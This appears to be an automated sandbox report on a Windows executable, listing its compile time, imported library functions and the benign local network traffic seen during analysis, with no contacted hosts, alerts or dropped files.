我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x475178 VirtualFree
0x47517c VirtualAlloc
0x475180 LocalFree
0x475184 LocalAlloc
0x475188 GetVersion
0x47518c GetCurrentThreadId
0x475198 VirtualQuery
0x47519c WideCharToMultiByte
0x4751a0 MultiByteToWideChar
0x4751a4 lstrlenA
0x4751a8 lstrcpynA
0x4751ac LoadLibraryExA
0x4751b0 GetThreadLocale
0x4751b4 GetStartupInfoA
0x4751b8 GetProcAddress
0x4751bc GetModuleHandleA
0x4751c0 GetModuleFileNameA
0x4751c4 GetLocaleInfoA
0x4751c8 GetCommandLineA
0x4751cc FreeLibrary
0x4751d0 FindFirstFileA
0x4751d4 FindClose
0x4751d8 ExitProcess
0x4751dc WriteFile
0x4751e4 RtlUnwind
0x4751e8 RaiseException
0x4751ec GetStdHandle
Library user32.dll:
0x4751f4 GetKeyboardType
0x4751f8 LoadStringA
0x4751fc MessageBoxA
0x475200 CharNextA
Library advapi32.dll:
0x475208 RegQueryValueExA
0x47520c RegOpenKeyExA
0x475210 RegCloseKey
Library oleaut32.dll:
0x475218 SysFreeString
0x47521c SysReAllocStringLen
0x475220 SysAllocStringLen
Library kernel32.dll:
0x475228 TlsSetValue
0x47522c TlsGetValue
0x475230 LocalAlloc
0x475234 GetModuleHandleA
Library advapi32.dll:
0x47523c RegQueryValueExA
0x475240 RegOpenKeyExA
0x475244 RegCloseKey
Library kernel32.dll:
0x47524c lstrcpyA
0x475250 WriteFile
0x475254 WaitForSingleObject
0x475258 VirtualQuery
0x47525c VirtualAlloc
0x475260 Sleep
0x475264 SizeofResource
0x475268 SetThreadLocale
0x47526c SetFilePointer
0x475270 SetEvent
0x475274 SetErrorMode
0x475278 SetEndOfFile
0x47527c ResetEvent
0x475280 ReadFile
0x475284 MultiByteToWideChar
0x475288 MulDiv
0x47528c LockResource
0x475290 LoadResource
0x475294 LoadLibraryA
0x4752a0 GlobalUnlock
0x4752a4 GlobalSize
0x4752a8 GlobalReAlloc
0x4752ac GlobalHandle
0x4752b0 GlobalLock
0x4752b4 GlobalFree
0x4752b8 GlobalFindAtomA
0x4752bc GlobalDeleteAtom
0x4752c0 GlobalAlloc
0x4752c4 GlobalAddAtomA
0x4752c8 GetVersionExA
0x4752cc GetVersion
0x4752d0 GetUserDefaultLCID
0x4752d4 GetTickCount
0x4752d8 GetThreadLocale
0x4752dc GetSystemInfo
0x4752e0 GetStringTypeExA
0x4752e4 GetStdHandle
0x4752e8 GetProcAddress
0x4752ec GetModuleHandleA
0x4752f0 GetModuleFileNameA
0x4752f4 GetLocaleInfoA
0x4752f8 GetLocalTime
0x4752fc GetLastError
0x475300 GetFullPathNameA
0x475304 GetFileAttributesA
0x475308 GetDiskFreeSpaceA
0x47530c GetDateFormatA
0x475310 GetCurrentThreadId
0x475314 GetCurrentProcessId
0x475318 GetComputerNameA
0x47531c GetCPInfo
0x475320 GetACP
0x475324 FreeResource
0x475328 InterlockedExchange
0x47532c FreeLibrary
0x475330 FormatMessageA
0x475334 FindResourceA
0x475338 FindFirstFileA
0x47533c FindClose
0x475348 EnumCalendarInfoA
0x475354 CreateThread
0x475358 CreateFileA
0x47535c CreateEventA
0x475360 CompareStringA
0x475364 CloseHandle
Library version.dll:
0x47536c VerQueryValueA
0x475374 GetFileVersionInfoA
Library gdi32.dll:
0x47537c UnrealizeObject
0x475380 StretchBlt
0x475384 SetWindowOrgEx
0x475388 SetWinMetaFileBits
0x47538c SetViewportOrgEx
0x475390 SetTextColor
0x475394 SetStretchBltMode
0x475398 SetROP2
0x47539c SetPixel
0x4753a0 SetMapMode
0x4753a4 SetEnhMetaFileBits
0x4753a8 SetDIBColorTable
0x4753ac SetColorSpace
0x4753b0 SetBrushOrgEx
0x4753b4 SetBkMode
0x4753b8 SetBkColor
0x4753bc SelectPalette
0x4753c0 SelectObject
0x4753c4 SelectClipRgn
0x4753c8 SaveDC
0x4753cc RestoreDC
0x4753d0 Rectangle
0x4753d4 RectVisible
0x4753d8 RealizePalette
0x4753dc Polyline
0x4753e0 PlayEnhMetaFile
0x4753e4 PatBlt
0x4753e8 MoveToEx
0x4753ec MaskBlt
0x4753f0 LineTo
0x4753f4 LPtoDP
0x4753f8 IntersectClipRect
0x4753fc GetWindowOrgEx
0x475400 GetWinMetaFileBits
0x475404 GetTextMetricsA
0x475410 GetStockObject
0x475414 GetPixel
0x475418 GetPaletteEntries
0x47541c GetObjectA
0x47542c GetEnhMetaFileBits
0x475430 GetDeviceCaps
0x475434 GetDIBits
0x475438 GetDIBColorTable
0x47543c GetDCOrgEx
0x475444 GetClipBox
0x475448 GetBrushOrgEx
0x47544c GetBitmapBits
0x475450 ExcludeClipRect
0x475454 DeleteObject
0x475458 DeleteEnhMetaFile
0x47545c DeleteDC
0x475460 CreateSolidBrush
0x475464 CreatePenIndirect
0x475468 CreatePalette
0x475470 CreateFontIndirectA
0x475474 CreateEnhMetaFileA
0x475478 CreateDIBitmap
0x47547c CreateDIBSection
0x475480 CreateCompatibleDC
0x475488 CreateBrushIndirect
0x47548c CreateBitmap
0x475490 CopyEnhMetaFileA
0x475494 CloseEnhMetaFile
0x475498 BitBlt
Library user32.dll:
0x4754a0 CreateWindowExA
0x4754a4 WindowFromPoint
0x4754a8 WinHelpA
0x4754ac WaitMessage
0x4754b0 UpdateWindow
0x4754b4 UnregisterClassA
0x4754b8 UnhookWindowsHookEx
0x4754bc TranslateMessage
0x4754c4 TrackPopupMenu
0x4754cc ShowWindow
0x4754d0 ShowScrollBar
0x4754d4 ShowOwnedPopups
0x4754d8 ShowCursor
0x4754dc SetWindowsHookExA
0x4754e0 SetWindowPos
0x4754e4 SetWindowPlacement
0x4754e8 SetWindowLongA
0x4754ec SetTimer
0x4754f0 SetScrollRange
0x4754f4 SetScrollPos
0x4754f8 SetScrollInfo
0x4754fc SetRect
0x475500 SetPropA
0x475504 SetParent
0x475508 SetMenuItemInfoA
0x47550c SetMenu
0x475510 SetForegroundWindow
0x475514 SetFocus
0x475518 SetCursor
0x47551c SetClassLongA
0x475520 SetCapture
0x475524 SetActiveWindow
0x475528 SendMessageA
0x47552c ScrollWindow
0x475530 ScreenToClient
0x475534 RemovePropA
0x475538 RemoveMenu
0x47553c ReleaseDC
0x475540 ReleaseCapture
0x47554c RegisterClassA
0x475550 RedrawWindow
0x475554 PtInRect
0x475558 PostQuitMessage
0x47555c PostMessageA
0x475560 PeekMessageA
0x475564 OffsetRect
0x475568 OemToCharA
0x47556c MessageBoxA
0x475570 MapWindowPoints
0x475574 MapVirtualKeyA
0x475578 LoadStringA
0x47557c LoadKeyboardLayoutA
0x475580 LoadIconA
0x475584 LoadCursorA
0x475588 LoadBitmapA
0x47558c KillTimer
0x475590 IsZoomed
0x475594 IsWindowVisible
0x475598 IsWindowEnabled
0x47559c IsWindow
0x4755a0 IsRectEmpty
0x4755a4 IsIconic
0x4755a8 IsDialogMessageA
0x4755ac IsChild
0x4755b0 InvalidateRect
0x4755b4 IntersectRect
0x4755b8 InsertMenuItemA
0x4755bc InsertMenuA
0x4755c0 InflateRect
0x4755c8 GetWindowTextA
0x4755cc GetWindowRect
0x4755d0 GetWindowPlacement
0x4755d4 GetWindowLongA
0x4755d8 GetWindowDC
0x4755dc GetTopWindow
0x4755e0 GetSystemMetrics
0x4755e4 GetSystemMenu
0x4755e8 GetSysColorBrush
0x4755ec GetSysColor
0x4755f0 GetSubMenu
0x4755f4 GetScrollRange
0x4755f8 GetScrollPos
0x4755fc GetScrollInfo
0x475600 GetPropA
0x475604 GetParent
0x475608 GetWindow
0x47560c GetMessageTime
0x475610 GetMenuStringA
0x475614 GetMenuState
0x475618 GetMenuItemInfoA
0x47561c GetMenuItemID
0x475620 GetMenuItemCount
0x475624 GetMenu
0x475628 GetLastActivePopup
0x47562c GetKeyboardState
0x475634 GetKeyboardLayout
0x475638 GetKeyState
0x47563c GetKeyNameTextA
0x475640 GetIconInfo
0x475644 GetForegroundWindow
0x475648 GetFocus
0x47564c GetDlgItem
0x475650 GetDesktopWindow
0x475654 GetDCEx
0x475658 GetDC
0x47565c GetCursorPos
0x475660 GetCursor
0x475664 GetClipboardData
0x475668 GetClientRect
0x47566c GetClassNameA
0x475670 GetClassInfoA
0x475674 GetCapture
0x475678 GetActiveWindow
0x47567c FrameRect
0x475680 FindWindowA
0x475684 FillRect
0x475688 EqualRect
0x47568c EnumWindows
0x475690 EnumThreadWindows
0x475694 EndPaint
0x475698 EndDeferWindowPos
0x47569c EnableWindow
0x4756a0 EnableScrollBar
0x4756a4 EnableMenuItem
0x4756a8 DrawTextA
0x4756ac DrawMenuBar
0x4756b0 DrawIconEx
0x4756b4 DrawIcon
0x4756b8 DrawFrameControl
0x4756bc DrawEdge
0x4756c0 DispatchMessageA
0x4756c4 DestroyWindow
0x4756c8 DestroyMenu
0x4756cc DestroyIcon
0x4756d0 DestroyCursor
0x4756d4 DeleteMenu
0x4756d8 DeferWindowPos
0x4756dc DefWindowProcA
0x4756e0 DefMDIChildProcA
0x4756e4 DefFrameProcA
0x4756e8 CreatePopupMenu
0x4756ec CreateMenu
0x4756f0 CreateIcon
0x4756f4 ClientToScreen
0x4756f8 CheckMenuItem
0x4756fc CallWindowProcA
0x475700 CallNextHookEx
0x475704 BeginPaint
0x475708 BeginDeferWindowPos
0x47570c CharNextA
0x475710 CharLowerBuffA
0x475714 CharLowerA
0x475718 CharToOemA
0x47571c AdjustWindowRectEx
Library kernel32.dll:
0x475728 Sleep
Library oleaut32.dll:
0x475730 SafeArrayPtrOfIndex
0x475734 SafeArrayGetUBound
0x475738 SafeArrayGetLBound
0x47573c SafeArrayCreate
0x475740 VariantChangeType
0x475744 VariantCopy
0x475748 VariantClear
0x47574c VariantInit
Library ole32.dll:
0x475758 IsAccelerator
0x47575c OleDraw
0x475764 CoTaskMemFree
0x475768 ProgIDFromCLSID
0x47576c StringFromCLSID
0x475770 CoCreateInstance
0x475774 CoGetClassObject
0x475778 CoUninitialize
0x47577c CoInitialize
0x475780 IsEqualGUID
Library oleaut32.dll:
0x475788 GetErrorInfo
0x47578c GetActiveObject
0x475790 SysFreeString
Library comctl32.dll:
0x4757a0 ImageList_Write
0x4757a4 ImageList_Read
0x4757b4 ImageList_DragMove
0x4757b8 ImageList_DragLeave
0x4757bc ImageList_DragEnter
0x4757c0 ImageList_EndDrag
0x4757c4 ImageList_BeginDrag
0x4757c8 ImageList_Remove
0x4757cc ImageList_DrawEx
0x4757d0 ImageList_Replace
0x4757d4 ImageList_Draw
0x4757e4 ImageList_Add
0x4757ec ImageList_Destroy
0x4757f0 ImageList_Create
Library comdlg32.dll:
0x4757f8 GetOpenFileNameA
Library wsock32.dll:
0x475800 WSACleanup
0x475804 WSAStartup
0x475808 WSAGetLastError
0x47580c getservbyname
0x475810 gethostbyname
0x475814 socket
0x475818 shutdown
0x47581c ntohs
0x475820 ioctlsocket
0x475824 inet_addr
0x475828 htons
0x47582c connect
0x475830 closesocket

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 57874 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57756 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 49714 239.255.255.250 3702
192.168.56.101 51966 239.255.255.250 1900

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.